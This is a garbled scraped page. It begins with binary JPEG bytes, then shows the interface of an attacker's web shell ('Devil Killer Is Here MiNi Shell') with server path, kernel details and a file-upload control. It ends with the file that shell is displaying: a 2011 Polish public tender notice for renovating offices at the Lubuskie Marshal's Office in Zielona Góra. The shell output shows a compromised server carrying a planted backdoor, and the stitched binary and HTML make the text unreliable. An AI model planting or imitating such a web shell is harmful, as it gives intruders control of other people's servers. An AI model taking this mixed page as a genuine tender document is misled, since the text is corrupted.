JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110606/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110606/157333-N-2011.html

<p class="kh_header"><b>Zielona Góra: Modernizacja pomieszczeń biurowych, korytarzy (parter), schodów oraz holu przed salą kolumnową w Urzędzie Marszałkowskim w Zielonej Górze przy ul. Podgórnej 7</b><br>
<b>Numer ogłoszenia: 157333 - 2011; data zamieszczenia: 06.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Marszałkowski Województwa Lubuskiego , ul. Podgórna 7, 65-057 Zielona Góra, woj. lubuskie, tel. 68 4565403, 4565404, 4565277, faks 68 4565404.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja pomieszczeń biurowych, korytarzy (parter), schodów oraz holu przed salą kolumnową w Urzędzie Marszałkowskim w Zielonej Górze przy ul. Podgórnej 7.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac przewidzianych w niniejszym postępowaniu obejmuje wykonanie następujących robót:

1)	podniesienie nadproży w drzwiach wewnętrznych i pomiędzy  pomieszczeniami oraz we wszystkich drzwiach do pomieszczeń dostępnych z korytarza wraz z powiększeniem ich szerokości. Wszystkie drzwi wraz z ościeżnicami nowe,
2)	wymiana warstw podłogowych we  wszystkich pomieszczeniach,
3)	szpachlowanie ścian i sufitów i dwukrotne  malowanie farbami akrylowymi, 
4)	montaż sufitu podwieszonego w korytarzu i sanitariatach,
5)	w sanitariatach obłożenia ścian płytkami ceramicznymi na całą wysokość,
6)	docieplenie  styropianem gr. 4 cm wnęk podokiennych i ich otynkowanie, 
7)	wykonanie nowej instalacji elektrycznej wraz z osprzętem oraz oprawami oświetleniowymi, 
8)	demontaż i montaż grzejników centralnego ogrzewania, 
9)	obudowanie istniejących  pionów instalacyjnych  w sanitariatach  płytami g-k  p. pożarowymi, odpornych na wilgoć, 
10)	zamontowanie nowej armatury sanitarnej w pomieszczeniach sanitarnych, 
11)	wymiana pionów kanalizacyjnych w sanitariatach, 
12)	wykonanie wentylacji grawitacyjnej wymuszonej w sanitariatach, 
13)	doprowadzenie kanałów nawiewnych do korytarza. Jednocześnie  wykorzystanie dwóch istniejących kanałów wentylacji grawitacyjnej do zapewnienia  wywiewu z korytarza,
14)	zamontowanie we wszystkich pomieszczeniach biurowych urządzeń klimatyzacyjnych, 
Do odprowadzenia skroplin wykonać bruzdy z korytarza i odprowadzić rurkami do kanalizacji 
w piwnicy. Agregaty umieszczono na dachu na specjalnej konstrukcji stalowej,
15)	montaż we wszystkich oknach żaluzji pionowych, w sanitariatach poziome drewniane,
16)	wykonanie nowych posadzek w holu wejściowym i holu przed salą    kolumnową wraz 
z rekonstrukcją schodów  i obłożenie ich płytami  granitowymi,
17)	zamontowanie platformy pionowej  dla niepełnosprawnych w holu wejściowym - wersja  standard - wysiadanie prostoliniowe,
18)	zamontowanie platformy schodowej dla niepełnosprawnych,
19)	wzmocnienie i remont balustrad przy schodach i w holu wejściowym,
     
 Uwaga: Zamawiający w modernizowanym budynku na I piętrze posiada  zamontowane klimatyzatory firmy Fujitsu zgodnie z wykazem stanowiącym załącznik nr 9 do SIWZ. Wymaga się, aby zaproponowane przez Wykonawcę urządzenia klimatyzacyjne w niniejszym postępowaniu były kompatybilne z istniejącą już instalacją, aby było możliwe sterowanie wszystkimi istniejącymi i docelowymi jednostkami w centralnych układach chłodniczych 
Z JEDNEGO NADRZĘDNEGO STEROWNIKA i aby w przypadku wbudowania przez Wykonawcę klimatyzatorów innych producentów (o parametrach nie gorszych niż wskazane w projekcie bud.-wykonawczym STWiOR), w przypadku awarii w wyniku braku kompatybilności, Zamawiający nie był zmuszony na utratę gwarancji producenta zamontowanych wcześniej urządzeń klimatyzacyjnych. 

2. 	Wykonawca zobowiązany jest do wykonania 2 razy w roku  przeglądów i konserwacji urządzeń klimatyzacyjnych w okresie gwarancyjnym. Wymaga się, aby na nowo zamontowane urządzenia klimatyzacyjne w ilości 47 sztuk (45 wewnętrznych + 2 zewnętrzne) i już wbudowane 
w ilości 12 urządzeń klimatyzacyjnych  (wewnętrzna - 11 szt. i zewnętrzna - 1 szt.), łącznie 59 szt., Wykonawca zapewnił jednego  serwisanta. Wykaz wbudowanych urządzeń klimatyzacyjnych  
i okres udzielonej  gwarancji podany jest w załączniku nr  9 do SIWZ.
                 
3. Szczegółowy opis przedmiotu (zał. nr 2 do SIWZ).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.33.12.20-4, 45.31.00.00-3, 45.33.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w przetargu jest wniesienie wadium w wysokości:   57 000,00 zł ( słownie: pięćdziesiąt siedem tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.	Wykonali w okresie ostatnich 5 lat  przed upływem terminu składania ofert, a  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dwie  roboty polegające  na budowie obiektu lub na remoncie pomieszczeń odpowiadających zakresowi przedmiotu zamówienia, na kwotę min. 1 000 000,00 zł brutto każda oraz wykonali,  co najmniej jeden centralny system chłodniczy na kwotę  min. 400 000,00 zł brutto.

Przez centralny system chłodniczy należy rozumieć  zaawansowany centralny system pompy   ciepła   typu   powietrze  -   powietrze   wykorzystujący   zmienny   przepływ 
i  bezpośredniego odparowania czynnika chłodniczego. 

Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże się robotami budowlanymi zakończonymi przed upływem terminu składania ofert. Nie należy wykazywać robót  będących w toku realizacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje lub będzie dysponował osobami zdolnymi do wykonania niniejszego zamówienia, tj.:
1. 	Kierownikiem Robót w specjalności konstrukcyjno - budowlanej - jedna osoba posiadająca następujące kwalifikacje zawodowe i doświadczenie:
1.1.	Minimum 5 letnia praktyka zawodowa (liczona od daty uzyskania uprawnień budowlanych) w danej specjalności.
1.2. Uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych 
w budownictwie do kierowania robotami w specjalności konstrukcyjno - budowlanej.
2. 	Kierownikiem Robót w specjalności sieci,  instalacji i urządzeń cieplnych,  wentylacyjnych, gazowych, wodociągowych 
i kanalizacyjnych- jedna osoba posiadająca następujące kwalifikacje zawodowe 
i doświadczenie:
2.1 	Minimum 5 letnia praktyka zawodowa (liczona od daty uzyskania uprawnień budowlanych) w danej specjalności.
2.2.	Uprawnienia budowlane bez ograniczeń do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami w specjalności instalacyjnej 
w zakresie sieci, instalacji i urządzeń cieplnych,  wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.

3. 	Kierownikiem Robót w specjalności sieci i instalacji elektrycznych i
	elektroenergetycznych - jedna osoba posiadająca następujące kwalifikacje zawodowe 
i doświadczenie:
3.1. 	Minimum 5 letnia praktyka zawodowa (liczona od daty uzyskania uprawnień budowlanych) w danej specjalności.
3.2.	Uprawnienia budowlane bez ograniczeń do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami w specjalności instalacyjnej 
w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych.

Uwaga!!: Pod pojęciem praktyki zawodowej Zamawiający rozumie okres czasu liczony od daty uzyskania uprawnień zawodowych do daty wszczęcia (ogłoszenia) niniejszego postępowania.

Uwaga!!! Pod pojęciem pełnienia funkcji Zamawiający rozumie wykonanie lub wykonywanie (obecnie) danej funkcji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.2.  Posiada środki finansowe lub zdolność kredytową na kwotę min. 1 500 000,00 zł.
Posiadają ubezpieczenie OC od odpowiedzialności cywilnej w zakresie prowadzonej   działalności związanej z przedmiotem zamówienia na kwotę co najmniej 1 500 000,00zł.

Jeżeli z ww. dokumentu nie wynika, że składka została opłacona, Wykonawca winien dołączyć potwierdzenie jej opłaty lub opłaty raty składki wymagalnej na dzień otwarcia ofert. Polisa winna być aktualna na dzień składania i otwarcia ofert.
Wykonawca winien posiadać w/w ubezpieczenie przez cały okres wykonywania zamówienia. 
Ze względu na specyfikę zawierania umów ubezpieczeniowych, obejmujących okresy nie dłuższe niż jeden rok, dopuszczalne jest, po podpisaniu umowy, sukcesywne przedstawianie dowodów opłacenia polisy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom jakościowym określonym przez Zamawiającego, Wykonawca załączy do oferty: 
1.	Dokument potwierdzający posiadanie przez Wykonawcę ważnego certyfikatu autoryzowanego punktu serwisowego centralnych systemów chłodniczych (jak w pkt. X, A), 1.1.) 
2.	Materiały firmowe producentów tj. opisy techniczne urządzeń klimatyzacyjnych wewnętrznych i zewnętrznych dla poz. 1-5 zał. nr 7  do SIWZ i  proponowanych przez Wykonawcę urządzeń, potwierdzające zgodność parametrów z minimalnymi  parametrami wymaganymi przez Zamawiającego  w załączniku nr 7 do SIWZ.
Szczegółowe informacje na temat wyposażenia i parametrów technicznych jednostek wewnętrznych i zewnętrznych określa Specyfikacja Techniczna Wykonania i Odbioru Robót  str. 3 -5.
3.	Materiały firmowe producentów tj. opisy techniczne urządzeń klimatyzacyjnych wewnętrznych i zewnętrznych dla poz. 1-5 zał. nr 7 do SIWZ i  proponowanych przez Wykonawcę urządzeń, potwierdzające zgodność parametrów z minimalnymi  parametrami wymaganymi przez Zamawiającego  w załączniku nr 7 do SIWZ.
Zaleca się  podanie na załączonych opisach technicznych, numeru pozycji z załącznika nr 7 do SIWZ w celu łatwiejszej identyfikacji dokumentów z oferowanym urządzeniem.

4.W  sytuacji zaproponowania urządzeń zgodnie z projektem i STWIOR tj. firmy Fujitsu 
w kolumnie 3 zał. nr 7 należy wpisać nie dotyczy.
Zamawiający dopuszcza rozwiązania  równoważne pod warunkiem opisanym w zał. nr 7 do SIWZ. 

5.UWAGA: Zamawiający wymaga dołączenia do oferty  dokumentu określonych w pkt 2 
w zakresie dotyczącym opisów technicznych urządzeń klimatyzacyjnych wewnętrznych
 i zewnętrznych oraz w pkt 3 tylko w przypadku, gdy Wykonawca zamierza użyć do realizacji niniejszego zamówienia urządzeń innych producentów  niż wskazanych 
w projektach budowlano-wykonawczych i STWiOR.

6.W przypadku nie wykazania się przez Wykonawcę, iż oferowane roboty budowlane odpowiadają wymaganiom jakościowym, oferta Wykonawcy zostanie odrzucona zgodnie z normą prawną art. 89 ust.1 pkt 2 ustawy Pzp.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany Formularz ofertowy - zgodnie z załącznikiem nr 1 do SIWZ. 
2.  Kosztorys ofertowy wykonany metodą uproszczoną.
3.	Pisemne zobowiązanie podmiotów trzecich do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia- jeśli dotyczy.
4.	Pełnomocnictwo - jeśli dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana treści umowy może nastąpić wyłącznie w granicach unormowania art. 144 ust. 1 ustawy Prawo zamówień publicznych za zgodą obu Stron i pod rygorem nieważności wymaga formy pisemnego aneksu, skutecznego po podpisaniu przez obie Strony.

Zamawiający zastrzega sobie prawo wprowadzenia zmian do zawartej umowy z wybranym Wykonawcą w niniejszym postępowaniu, w przypadku wystąpienia niżej podanych okoliczności:

1.	Zmiany wynagrodzenia Wykonawcy w przypadku ustawowej zmiany wysokości stawki podatku VAT. 
2.	W przypadku konieczności przesunięcia terminów umownych, jeśli konieczność ta nastąpiła na skutek okoliczności, których nie można było przewidzieć w chwili zawierania niniejszej umowy tj.:
	2.1. W przypadku wystąpienia robót dodatkowych nieobjętych przedmiotem zamówienia, których nie można było przewiedzieć w chwili zawierania umowy.
W przypadku zagrożenia opóźnieniem w wykonywaniu prac ze strony Wykonawcy Zamawiający może zażądać od Wykonawcy zwiększenia potencjału, tak aby  Wykonawca zrealizował przedmiot zamówienia w terminie wynikającym  z umowy. 
2.2.   	W przypadku konieczności wprowadzenia zmian projektowych, niemających wpływu na cenę Wówczas termin zakończenia robót zostanie przedłużony o czas niezbędny do wykonania tychże robót będących następstwem naniesionych zmian.
2.3. 	Z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego.
2.4. 	Z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
2.5.	Z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grążącego powstaniem szkody 
w znacznych rozmiarach. 
3. 	W sytuacji zamiany materiału budowlanego lub technologii, zakres robót, przy którym to uczyniono, może zostać (w zależności od decyzji Zamawiającego) wyłączony spod wynagrodzenia kosztorysowego i rozliczony zostanie po dokonaniu obmiaru, kosztorysem powykonawczym. 
4. W przypadku zmiany kadry kierowniczej po stronie Wykonawcy przewidzianej do realizacji zamówienia - Wykonawca zobowiązany jest zastąpić te osoby osobami posiadającymi takie same uprawnienia i spełniające te same warunki określone w rozdziale X ust. A  pkt 1 ppkt 1.3. SIWZ.
5.  Zamawiający dopuszcza możliwość wystąpienia w trakcie  realizacji przedmiotu umowy konieczność wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową, w sytuacji,
gdy wykonanie tych robót będzie niezbędne do prawidłowego,tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania  przedmiotu  umowy.
6. Zamawiający dopuszcza  wprowadzenie zmiany materiałów i urządzeń przedstawionych w ofercie przetargowej  pod warunkiem, że zmiany te będą korzystne  dla  Zamawiającego.  Zmiany te dotyczyć następujących okoliczności:
a)	powodujące poprawienie  parametrów technicznych ,
b)	wynikające z aktualizacji rozwiązań  z uwagi na postęp technologiczny lub zmiany  obowiązujących  przepisów,
c)	powodujące obniżenie kosztu ponoszonego przez Zamawiającego  na eksploatację 
i konserwację wykonanego przedmiotu zamówienia,
d)	dopuszcza się możliwość  zmiany producenta poszczególnych materiałów i urządzeń  przedstawionych w ofercie, pod warunkiem , że zmiana ta nie spowoduje obniżenia parametrów tych materiałów lub urządzeń.
7. Zmiany,  o których mowa w pkt 5 i 6  muszą być każdorazowo   zatwierdzone  przez Zamawiającego w porozumieniu  z projektantem/ inspektorem nadzoru.
8. Zmiany  powyższe  nie  spowodują  zmiany ceny wykonania przedmiotu umowy, którą będzie zaoferowana przez Wykonawcę w  zał. nr 1do SIWZ  pn.  Formularz Oferty
9.	W przypadku zmiany inspektora nadzoru po stronie Zamawiającego.
10.	W przypadku zmiany terminów płatności faktur i rozliczania przedmiotu umowy.
 11. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest  poinformować Zamawiającego pisemnie i natychmiast odnotować to w dzienniku budowy.
12. O wystąpieniu okoliczności mogących wpłynąć na zmianę umowy Wykonawca winien jest poinformować Zamawiającego pisemnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubuskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski w Zielonej Górze, ul. Podgórna 7, 65-057 Zielona Góra, Wydział Zamówień Publicznych pok. nr 52 ( parter).</p>
